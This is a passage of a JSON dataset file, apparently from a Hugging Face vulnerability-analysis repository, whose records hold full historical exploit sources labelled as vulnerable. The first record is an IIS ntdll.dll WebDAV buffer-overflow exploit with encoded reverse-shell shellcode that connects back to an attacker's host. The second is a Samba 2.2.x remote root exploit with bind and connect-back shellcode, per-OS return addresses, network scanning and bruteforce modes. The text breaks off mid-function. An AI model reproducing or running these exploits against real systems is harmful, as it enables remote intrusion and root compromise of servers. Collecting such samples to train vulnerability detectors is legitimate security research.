Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
compiled_exploits.json5342 linesDownload Raw Back to exploit-analyzer
1[
2    {
3        "exploit_id": 1,
4        "content": "/*******************************************************************/\n\n/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */\n\n/* --------------------------------------------------------------- */\n\n/* this is the exploit for ntdll.dll through WebDAV. */\n\n/* run a netcat ex: nc -L -vv -p 666 */\n\n/* wb server.com your_ip 666 0 */\n\n/* the shellcode is a reverse remote shell */\n\n/* you need to pad a bit.. the best way I think is launching */\n\n/* the exploit with pad = 0 and after that, the server will be */\n\n/* down for a couple of seconds, now retry with pad at 1 */\n\n/* and so on..pad 2.. pad 3.. if you haven't the shell after */\n\n/* something like pad at 10 I think you better to restart from */\n\n/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */\n\n/* on all the others servers it was at 2,3,4, etc..sometimes */\n\n/* you can have the force with you, and get the shell in 1 try */\n\n/* sometimes you need to pad more than 10 times ;) */\n\n/* the shellcode was coded by myself, it is SEH + ScanMem to */\n\n/* find the famous offsets (GetProcAddress).. */\n\n/* */\n\n/*******************************************************************/\n\n\n\n\n\n#include <winsock.h>\n\n#include <windows.h>\n\n#include <stdio.h>\n\n\n\n#pragma comment (lib,\"ws2_32\")\n\n\n\nchar shellc0de[] =\n\n\"\\x55\\x8b\\xec\\x33\\xc9\\x53\\x56\\x57\\x8d\\x7d\\xa2\\xb1\\x25\\xb8\\xcc\\xcc\"\n\n\"\\xcc\\xcc\\xf3\\xab\\xeb\\x09\\xeb\\x0c\\x58\\x5b\\x59\\x5a\\x5c\\x5d\\xc3\\xe8\"\n\n\"\\xf2\\xff\\xff\\xff\\x5b\\x80\\xc3\\x10\\x33\\xc9\\x66\\xb9\\xb5\\x01\\x80\\x33\"\n\n\"\\x95\\x43\\xe2\\xfa\\x66\\x83\\xeb\\x67\\xfc\\x8b\\xcb\\x8b\\xf3\\x66\\x83\\xc6\"\n\n\"\\x46\\xad\\x56\\x40\\x74\\x16\\x55\\xe8\\x13\\x00\\x00\\x00\\x8b\\x64\\x24\\x08\"\n\n\"\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x58\\x5d\\x5e\\xeb\\xe5\\x58\\xeb\\xb9\\x64\"\n\n\"\\xff\\x35\\x00\\x00\\x00\\x00\\x64\\x89\\x25\\x00\\x00\\x00\\x00\\x48\\x66\\x81\"\n\n\"\\x38\\x4d\\x5a\\x75\\xdb\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x5d\\x5e\\x8b\\xe8\"\n\n\"\\x03\\x40\\x3c\\x8b\\x78\\x78\\x03\\xfd\\x8b\\x77\\x20\\x03\\xf5\\x33\\xd2\\x8b\"\n\n\"\\x06\\x03\\xc5\\x81\\x38\\x47\\x65\\x74\\x50\\x75\\x25\\x81\\x78\\x04\\x72\\x6f\"\n\n\"\\x63\\x41\\x75\\x1c\\x81\\x78\\x08\\x64\\x64\\x72\\x65\\x75\\x13\\x8b\\x47\\x24\"\n\n\"\\x03\\xc5\\x0f\\xb7\\x1c\\x50\\x8b\\x47\\x1c\\x03\\xc5\\x8b\\x1c\\x98\\x03\\xdd\"\n\n\"\\x83\\xc6\\x04\\x42\\x3b\\x57\\x18\\x75\\xc6\\x8b\\xf1\\x56\\x55\\xff\\xd3\\x83\"\n\n\"\\xc6\\x0f\\x89\\x44\\x24\\x20\\x56\\x55\\xff\\xd3\\x8b\\xec\\x81\\xec\\x94\\x00\"\n\n\"\\x00\\x00\\x83\\xc6\\x0d\\x56\\xff\\xd0\\x89\\x85\\x7c\\xff\\xff\\xff\\x89\\x9d\"\n\n\"\\x78\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x33\\xc9\\x51\\x51\\x51\"\n\n\"\\x51\\x41\\x51\\x41\\x51\\xff\\xd0\\x89\\x85\\x94\\x00\\x00\\x00\\x8b\\x85\\x7c\"\n\n\"\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x83\\xc6\\x08\\x6a\\x10\\x56\"\n\n\"\\x8b\\x8d\\x94\\x00\\x00\\x00\\x51\\xff\\xd0\\x33\\xdb\\xc7\\x45\\x8c\\x44\\x00\"\n\n\"\\x00\\x00\\x89\\x5d\\x90\\x89\\x5d\\x94\\x89\\x5d\\x98\\x89\\x5d\\x9c\\x89\\x5d\"\n\n\"\\xa0\\x89\\x5d\\xa4\\x89\\x5d\\xa8\\xc7\\x45\\xb8\\x01\\x01\\x00\\x00\\x89\\x5d\"\n\n\"\\xbc\\x89\\x5d\\xc0\\x8b\\x9d\\x94\\x00\\x00\\x00\\x89\\x5d\\xc4\\x89\\x5d\\xc8\"\n\n\"\\x89\\x5d\\xcc\\x8d\\x45\\xd0\\x50\\x8d\\x4d\\x8c\\x51\\x6a\\x00\\x6a\\x00\\x6a\"\n\n\"\\x00\\x6a\\x01\\x6a\\x00\\x6a\\x00\\x83\\xc6\\x09\\x56\\x6a\\x00\\x8b\\x45\\x20\"\n\n\"\\xff\\xd0\"\n\n\"CreateProcessA\\x00LoadLibraryA\\x00ws2_32.dll\\x00WSASocketA\\x00\"\n\n\"connect\\x00\\x02\\x00\\x02\\x9A\\xC0\\xA8\\x01\\x01\\x00\"\n\n\"cmd\" // don't change anything..\n\n\"\\x00\\x00\\xe7\\x77\" // offsets of kernel32.dll for some win ver..\n\n\"\\x00\\x00\\xe8\\x77\"\n\n\"\\x00\\x00\\xf0\\x77\"\n\n\"\\x00\\x00\\xe4\\x77\"\n\n\"\\x00\\x88\\x3e\\x04\" // win2k3\n\n\"\\x00\\x00\\xf7\\xbf\" // win9x =P\n\n\"\\xff\\xff\\xff\\xff\";\n\n\n\nint test_host(char *host)\n\n{\n\nchar search[100]=\"\";\n\nint sock;\n\nstruct hostent *heh;\n\nstruct sockaddr_in hmm;\n\nchar buf[100] =\"\";\n\n\n\nif(strlen(host)>60) {\n\nprintf(\"error: victim host too long.\\r\\n\");\n\nreturn 1;\n\n}\n\n\n\nif ((heh = gethostbyname(host))==0){\n\nprintf(\"error: can't resolve '%s'\",host);\n\nreturn 1;\n\n}\n\n\n\nsprintf(search,\"SEARCH / HTTP/1.1\\r\\nHost: %s\\r\\n\\r\\n\",host);\n\nhmm.sin_port = htons(80);\n\nhmm.sin_family = AF_INET;\n\nhmm.sin_addr = *((struct in_addr *)heh->h_addr);\n\n\n\nif ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){\n\nprintf(\"error: can't create socket\");\n\nreturn 1;\n\n}\n\n\n\nprintf(\"Checking WebDav on '%s' ... \",host);\n\n\n\nif ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){\n\nprintf(\"CONNECTING_ERROR\\r\\n\");\n\nreturn 1;\n\n}\n\nsend(sock,search,strlen(search),0);\n\nrecv(sock,buf,sizeof(buf),0);\n\nif(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')\n\nreturn 0;\n\nprintf(\"NOT FOUND\\r\\n\");\n\nreturn 1;\n\n}\n\n\n\nvoid help(char *program)\n\n{\n\nprintf(\"syntax: %s <victim_host> <your_host> <your_port> [padding]\\r\\n\",program);\n\nreturn;\n\n}\n\n\n\nvoid banner(void)\n\n{\n\nprintf(\"\\r\\n\\t [Crpt] ntdll.dll exploit trough WebDAV by kralor\n\n[Crpt]\\r\\n\");\n\nprintf(\"\\t\\twww.coromputer.net && undernet #coromputer\\r\\n\\r\\n\");\n\nreturn;\n\n}\n\n\n\nvoid main(int argc, char *argv[])\n\n{\n\nWSADATA wsaData;\n\nunsigned short port=0;\n\nchar *port_to_shell=\"\", *ip1=\"\", data[50]=\"\";\n\nunsigned int i,j;\n\nunsigned int ip = 0 ;\n\nint s, PAD=0x10;\n\nstruct hostent *he;\n\nstruct sockaddr_in crpt;\n\nchar buffer[65536] =\"\";\n\nchar request[80000]; // huuuh, what a mess! :)\n\nchar content[] =\n\n\"<?xml version=\\\"1.0\\\"?>\\r\\n\"\n\n\"<g:searchrequest xmlns:g=\\\"DAV:\\\">\\r\\n\"\n\n\"<g:sql>\\r\\n\"\n\n\"Select \\\"DAV:displayname\\\" from scope()\\r\\n\"\n\n\"</g:sql>\\r\\n\"\n\n\"</g:searchrequest>\\r\\n\";\n\n\n\nbanner();\n\nif((argc<4)||(argc>5)) {\n\nhelp(argv[0]);\n\nreturn;\n\n}\n\n\n\nif(WSAStartup(0x0101,&wsaData)!=0) {\n\nprintf(\"error starting winsock..\");\n\nreturn;\n\n}\n\n\n\nif(test_host(argv[1]))\n\nreturn;\n\n\n\nif(argc==5)\n\nPAD+=atoi(argv[4]);\n\n\n\nprintf(\"FOUND\\r\\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\\r\\n\",PAD,PAD);\n\n\n\nip = inet_addr(argv[2]); ip1 = (char*)&ip;\n\n\n\nshellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];\n\nshellc0de[451]=ip1[3];\n\n\n\nport = htons(atoi(argv[3]));\n\nport_to_shell = (char *) &port;\n\nshellc0de[446]=port_to_shell[0];\n\nshellc0de[447]=port_to_shell[1];\n\n\n\n// we xor the shellcode [xored by 0x95 to avoid bad chars]\n\n__asm {\n\nlea eax, shellc0de\n\nadd eax, 0x34\n\nxor ecx, ecx\n\nmov cx, 0x1b0\n\nwah:\n\nxor byte ptr[eax], 0x95\n\ninc eax\n\nloop wah\n\n}\n\n\n\nif ((he = gethostbyname(argv[1]))==0){\n\nprintf(\"error: can't resolve '%s'\",argv[1]);\n\nreturn;\n\n}\n\n\n\ncrpt.sin_port = htons(80);\n\ncrpt.sin_family = AF_INET;\n\ncrpt.sin_addr = *((struct in_addr *)he->h_addr);\n\n\n\nif ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){\n\nprintf(\"error: can't create socket\");\n\nreturn;\n\n}\n\n\n\nprintf(\"Connecting... \");\n\n\n\nif ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){\n\nprintf(\"ERROR\\r\\n\");\n\nreturn;\n\n}\n\n// No Operation.\n\nfor(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);\n\n// fill the buffer with the shellcode\n\nfor(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);\n\n// well..it is not necessary..\n\nfor(i=0;i<2500;buffer[i]=PAD,i++);\n\n\n\n/* we can simply put our ret in this 2 offsets.. */\n\n//buffer[2086]=PAD;\n\n//buffer[2085]=PAD;\n\n\n\nbuffer[sizeof(buffer)]=0x00;\n\nmemset(request,0,sizeof(request));\n\nmemset(data,0,sizeof(data));\n\nsprintf(request,\"SEARCH /%s HTTP/1.1\\r\\nHost: %s\\r\\nContent-type: text/xml\\r\\nContent-Length: \",buffer,argv[1]);\n\nsprintf(request,\"%s%d\\r\\n\\r\\n\",request,strlen(content));\n\nprintf(\"CONNECTED\\r\\nSending evil request... \");\n\nsend(s,request,strlen(request),0);\n\nsend(s,content,strlen(content),0);\n\nprintf(\"SENT\\r\\n\");\n\nrecv(s,data,sizeof(data),0);\n\nif(data[0]!=0x00) {\n\nprintf(\"Server seems to be patched.\\r\\n\");\n\nprintf(\"data: %s\\r\\n\",data);\n\n} else\n\nprintf(\"Now if you are lucky you will get a shell.\\r\\n\");\n\nclosesocket(s);\n\nreturn;\n\n}\n\n\n\n// milw0rm.com [2003-03-23]",
5        "vulnerable": true
6    },
7    {
8        "exploit_id": 10,
9        "content": "/*\n\n    Remote root exploit for Samba 2.2.x and prior that works against \n\n    Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and \n\n    OpenBSD (2.x, 3.x and 3.2 non-executable stack). \n\n    sambal.c is able to identify samba boxes. It will send a netbios\n\n    name packet to port 137. If the box responds with the mac address\n\n    00-00-00-00-00-00, it's probally running samba.\n\n \n\n    [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0\n\n    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n\n    --------------------------------------------------------------\n\n    + Scan mode.\n\n    + [192.168.0.3] Samba\n\n    + [192.168.0.10] Windows\n\n    + [192.168.0.20] Windows\n\n    + [192.168.0.21] Samba\n\n    + [192.168.0.30] Windows\n\n    + [192.168.0.31] Samba\n\n    + [192.168.0.33] Windows\n\n    + [192.168.0.35] Windows\n\n    + [192.168.0.36] Windows\n\n    + [192.168.0.37] Windows\n\n    ...\n\n    + [192.168.0.133] Samba\n\n\n\n    Great!\n\n    You could now try a preset (-t0 for a list), but most of the \n\n    time bruteforce will do. The smbd spawns a new process on every \n\n    connect, so we can bruteforce the return address...\n\n\n\n    [esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133\n\n    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n\n    --------------------------------------------------------------\n\n    + Verbose mode.\n\n    + Bruteforce mode. (Linux)\n\n    + Using ret: [0xbffffed4]\n\n    + Using ret: [0xbffffda8]\n\n    + Using ret: [0xbffffc7c]\n\n    + Using ret: [0xbffffb50]\n\n    + Using ret: [0xbffffa24]\n\n    + Using ret: [0xbffff8f8]\n\n    + Using ret: [0xbffff7cc]\n\n    + Worked!\n\n    --------------------------------------------------------------\n\n  Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586\n\n i586 i386 GNU/Linux\n\n    uid=0(root) gid=0(root) groups=99(nobody)\n\n\n\nsambal.c : samba-2.2.8 < remote root exploit by eSDee (www.netric.org|\n\n\n\n*/\n\n  \n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <stdlib.h>\n\n#include <netdb.h>\n\n#include <errno.h>\n\n#include <fcntl.h>\n\n#include <signal.h>\n\n#include <string.h>\n\n#include <unistd.h>\n\n#include <sys/select.h>\n\n#include <sys/socket.h>\n\n#include <sys/types.h>\n\n#include <sys/time.h>\n\n#include <sys/wait.h>\n\n#include <netinet/in.h>\n\n#include <arpa/inet.h>\n\n\n\ntypedef struct {\n\n        unsigned char type;\n\n        unsigned char flags;\n\n        unsigned short length;\n\n} NETBIOS_HEADER;\n\n\n\ntypedef struct {\n\n        unsigned char protocol[4];\n\n        unsigned char command;\n\n        unsigned short status;\n\n        unsigned char reserved;\n\n        unsigned char  flags;\n\n        unsigned short flags2;\n\n        unsigned char  pad[12];\n\n        unsigned short tid;\n\n        unsigned short pid;\n\n        unsigned short uid;\n\n        unsigned short mid;\n\n} SMB_HEADER;\n\n\n\nint OWNED = 0;\n\npid_t childs[100];\n\nstruct sockaddr_in addr1;\n\nstruct sockaddr_in addr2;\n\n\n\nchar linux_bindcode[] =\n\n        \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"\n\n        \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\\x89\\xc1\\x31\\xc0\\x31\\xdb\\x50\\x50\"\n\n        \"\\x50\\x66\\x68\\xb0\\xef\\xb3\\x02\\x66\\x53\\x89\\xe2\\xb3\\x10\\x53\\xb3\\x02\"\n\n        \"\\x52\\x51\\x89\\xca\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\x05\"\n\n        \"\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\\x50\\x52\\x89\\xe1\\xb3\\x04\\xb0\\x66\\xcd\"\n\n        \"\\x80\\x89\\xd7\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb3\\x11\\xb1\\x01\\xb0\\x30\\xcd\"\n\n        \"\\x80\\x31\\xc0\\x31\\xdb\\x50\\x50\\x57\\x89\\xe1\\xb3\\x05\\xb0\\x66\\xcd\\x80\"\n\n        \"\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\\x39\\xc3\\x75\\x40\\x31\\xc0\"\n\n        \"\\x89\\xfb\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x31\\xc9\\x89\\xf3\\xb0\\x3f\\xcd\\x80\"\n\n        \"\\x31\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\"\n\n        \"\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x8b\\x54\\x24\"\n\n        \"\\x08\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\"\n\n        \"\\x89\\xf3\\xb0\\x06\\xcd\\x80\\xeb\\x99\";\n\n\n\nchar bsd_bindcode[] =\n\n        \"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\"\n\n        \"\\x61\\xcd\\x80\\x89\\xc7\\x31\\xc0\\x50\\x50\\x50\\x66\\x68\\xb0\\xef\\xb7\\x02\"\n\n        \"\\x66\\x53\\x89\\xe1\\x31\\xdb\\xb3\\x10\\x53\\x51\\x57\\x50\\xb0\\x68\\xcd\\x80\"\n\n        \"\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x50\\x57\"\n\n        \"\\x50\\xb0\\x6a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x50\\x89\\xe1\\xb3\\x01\\x53\\x89\"\n\n        \"\\xe2\\x50\\x51\\x52\\xb3\\x14\\x53\\x50\\xb0\\x2e\\xcd\\x80\\x31\\xc0\\x50\\x50\"\n\n        \"\\x57\\x50\\xb0\\x1e\\xcd\\x80\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\"\n\n        \"\\x39\\xc3\\x75\\x44\\x31\\xc0\\x57\\x50\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x50\\x56\"\n\n        \"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\"\n\n        \"\\x80\\x31\\xc0\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\"\n\n        \"\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\\x53\\x50\\xb0\\x3b\"\n\n        \"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x56\\x50\\xb0\\x06\\xcd\\x80\"\n\n        \"\\xeb\\x9a\";\n\n\n\nchar linux_connect_back[] =\n\n        \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"\n\n        \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\\x89\\xc2\\x31\\xc0\\x31\\xc9\\x51\\x51\"\n\n        \"\\x68\\x41\\x42\\x43\\x44\\x66\\x68\\xb0\\xef\\xb1\\x02\\x66\\x51\\x89\\xe7\\xb3\"\n\n        \"\\x10\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\\xb0\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\"\n\n        \"\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\"\n\n        \"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\"\n\n        \"\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x31\\xd2\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\"\n\n        \"\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\"\n\n        \"\\x01\\xcd\\x80\"; \n\n\n\nchar bsd_connect_back[] =\n\n        \"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\"\n\n        \"\\x61\\xcd\\x80\\x31\\xd2\\x52\\x52\\x68\\x41\\x41\\x41\\x41\\x66\\x68\\xb0\\xef\"\n\n        \"\\xb7\\x02\\x66\\x53\\x89\\xe1\\xb2\\x10\\x52\\x51\\x50\\x52\\x89\\xc2\\x31\\xc0\"\n\n        \"\\xb0\\x62\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\"\n\n        \"\\x31\\xc0\\x50\\x52\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x52\"\n\n        \"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x43\\x53\\x52\\x50\\xb0\\x5a\\xcd\\x80\\x31\"\n\n        \"\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\"\n\n        \"\\x53\\x50\\xb0\\x3b\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\";\n\n\n\n\n\n\n\nstruct {\n\n        char *type;\n\n        unsigned long ret;\n\n        char *shellcode;\n\n        int os_type;    /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */\n\n\n\n} targets[] = {\n\n        { \"samba-2.2.x - Debian 3.0           \", 0xbffffea2, linux_bindcode, 0 },\n\n        { \"samba-2.2.x - Gentoo 1.4.x         \", 0xbfffe890, linux_bindcode, 0 },\n\n        { \"samba-2.2.x - Mandrake 8.x         \", 0xbffff6a0, linux_bindcode, 0 },\n\n        { \"samba-2.2.x - Mandrake 9.0         \", 0xbfffe638, linux_bindcode, 0 },\n\n        { \"samba-2.2.x - Redhat 9.0           \", 0xbffff7cc, linux_bindcode, 0 },\n\n        { \"samba-2.2.x - Redhat 8.0           \", 0xbffff2f0, linux_bindcode, 0 },\n\n        { \"samba-2.2.x - Redhat 7.x           \", 0xbffff310, linux_bindcode, 0 },\n\n        { \"samba-2.2.x - Redhat 6.x           \", 0xbffff2f0, linux_bindcode, 0 },\n\n        { \"samba-2.2.x - Slackware 9.0        \", 0xbffff574, linux_bindcode, 0 },\n\n        { \"samba-2.2.x - Slackware 8.x        \", 0xbffff574, linux_bindcode, 0 },\n\n        { \"samba-2.2.x - SuSE 7.x             \", 0xbffffbe6, linux_bindcode, 0 }, \n\n        { \"samba-2.2.x - SuSE 8.x             \", 0xbffff8f8, linux_bindcode, 0 },\n\n        { \"samba-2.2.x - FreeBSD 5.0          \", 0xbfbff374, bsd_bindcode, 1 },\n\n        { \"samba-2.2.x - FreeBSD 4.x          \", 0xbfbff374, bsd_bindcode, 1 },\n\n        { \"samba-2.2.x - NetBSD 1.6           \", 0xbfbfd5d0, bsd_bindcode, 1 },\n\n        { \"samba-2.2.x - NetBSD 1.5           \", 0xbfbfd520, bsd_bindcode, 1 },\n\n        { \"samba-2.2.x - OpenBSD 3.2          \", 0x00159198, bsd_bindcode, 2 },\n\n        { \"samba-2.2.8 - OpenBSD 3.2 (package)\", 0x001dd258, bsd_bindcode, 2 },\n\n        { \"samba-2.2.7 - OpenBSD 3.2 (package)\", 0x001d9230, bsd_bindcode, 2 },\n\n        { \"samba-2.2.5 - OpenBSD 3.2 (package)\", 0x001d6170, bsd_bindcode, 2 },\n\n        { \"Crash (All platforms)              \", 0xbade5dee, linux_bindcode, 0 },\n\n};\n\n\n\nvoid shell();\n\nvoid usage();\n\nvoid handler();\n\n\n\nint is_samba(char *ip, unsigned long time_out);\n\nint Connect(int fd, char *ip, unsigned int port, unsigned int time_out);\n\nint read_timer(int fd, unsigned int time_out);\n\nint write_timer(int fd, unsigned int time_out);\n\nint start_session(int sock);\n\nint exploit_normal(int sock, unsigned long ret, char *shellcode);\n\nint exploit_openbsd32(int sock, unsigned long ret, char *shellcode);\n\n\n\nvoid usage(char *prog)\n\n{\n\n        fprintf(stderr, \"Usage: %s [-bBcCdfprsStv] [host]\\n\\n\"\n\n                        \"-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\\n\"\n\n                        \"-B <step>       bruteforce steps (default = 300)\\n\"\n\n                        \"-c <ip address> connectback ip address\\n\"\n\n                        \"-C <max childs> max childs for scan/bruteforce mode (default = 40)\\n\"\n\n                        \"-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)\\n\"\n\n                        \"-f              force\\n\" \n\n                        \"-p <port>       port to attack (default = 139)\\n\"\n\n                        \"-r <ret>        return address\\n\"\n\n                        \"-s              scan mode (random)\\n\"\n\n                        \"-S <network>    scan mode\\n\"\n\n                        \"-t <type>       presets (0 for a list)\\n\" \n\n                        \"-v              verbose mode\\n\\n\", prog);\n\n        \n\n        exit(1);\n\n}\n\n\n\nint is_samba(char *ip, unsigned long time_out)\n\n{\n\n        char\n\n        nbtname[]= /* netbios name packet */\n\n        {\n\n                0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,\n\n                0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,\n\n                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,\n\n                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,\n\n                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,\n\n                0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,\n\n                0x00,0x01\n\n        };\n\n\n\n        unsigned char recv_buf[1024];\n\n        unsigned char *ptr;\n\n\n\n        int i = 0;\n\n        int s = 0;\n\n\n\n        unsigned int total = 0;\n\n\n\n        if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;\n\n\n\n        if(Connect(s, ip, 137, time_out) == -1) {\n\n                close(s);\n\n                return -1;\n\n        } \n\n\n\n        memset(recv_buf, 0x00, sizeof(recv_buf));\n\n\n\n        if(write_timer(s, time_out) == 1) {\n\n                if (write(s, nbtname, sizeof(nbtname)) <= 0) {\n\n                        close(s);\n\n                        return -1;\n\n                }\n\n        }\n\n\n\n        if (read_timer(s, time_out) == 1) {\n\n                if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {\n\n                        close(s);\n\n                        return -1;\n\n                }\n\n\n\n                ptr = recv_buf + 57;\n\n                total = *(ptr - 1); /* max names */\n\n\n\n                while(ptr < recv_buf + sizeof(recv_buf)) {\n\n                        ptr += 18;\n\n                        if (i == total) {\n\n\n\n                                ptr -= 19;                      \n\n\n\n                                if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&\n\n                                     *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {\n\n                                        close(s);\n\n                                        return 0;\n\n                                }\n\n\n\n                                close(s);\n\n                                return 1;\n\n                        }\n\n\n\n                        i++;    \n\n                }\n\n\n\n        }\n\n        close(s);\n\n        return -1;\n\n}\n\n\n\nint Connect(int fd, char *ip, unsigned int port, unsigned int time_out) \n\n{\n\n        /* ripped from no1 */\n\n\n\n        int                      flags;\n\n        int                      select_status;\n\n        fd_set                   connect_read, connect_write;\n\n        struct timeval           timeout;\n\n        int                      getsockopt_length = 0;\n\n        int                      getsockopt_error = 0;\n\n        struct sockaddr_in       server;\n\n        bzero(&server, sizeof(server));\n\n        server.sin_family = AF_INET;\n\n        inet_pton(AF_INET, ip, &server.sin_addr);\n\n        server.sin_port = htons(port);\n\n\n\n        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {\n\n                close(fd);\n\n                return -1;\n\n        }\n\n  \n\n        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {\n\n                close(fd);\n\n                return -1;\n\n        }\n\n        \n\n        timeout.tv_sec = time_out;\n\n        timeout.tv_usec = 0;\n\n        FD_ZERO(&connect_read);\n\n        FD_ZERO(&connect_write);\n\n        FD_SET(fd, &connect_read);\n\n        FD_SET(fd, &connect_write);\n\n\n\n        if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {\n\n                if(errno != EINPROGRESS) {\n\n                        close(fd);\n\n                        return -1;\n\n                }\n\n        }\n\n        else {\n\n                if(fcntl(fd, F_SETFL, flags) < 0) {\n\n                        close(fd);\n\n                        return -1;\n\n                }\n\n                \n\n                return 1;\n\n\n\n        }\n\n\n\n        select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);\n\n\n\n        if(select_status == 0) {\n\n                close(fd);\n\n                return -1;\n\n\n\n        }\n\n\n\n        if(select_status == -1) {\n\n                close(fd);\n\n                return -1;\n\n        }\n\n\n\n        if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {\n\n                if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))\n\n {\n\n                        getsockopt_length = sizeof(getsockopt_error);\n\n\n\n                        if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {\n\n                                errno = ETIMEDOUT;\n\n                                close(fd);\n\n                                return -1;\n\n                        }\n\n\n\n                        if(getsockopt_error == 0) {\n\n                                if(fcntl(fd, F_SETFL, flags) < 0) {\n\n                                        close(fd);\n\n                                        return -1;\n\n                                }\n\n                                return 1;\n\n                        } \n\n\n\n                        else {\n\n                                errno = getsockopt_error;\n\n                                close(fd);\n\n                                return (-1);\n\n                                }\n\n\n\n                        }\n\n                }\n\n        else {\n\n                close(fd);\n\n                return 1;\n\n        }\n\n\n\n        if(fcntl(fd, 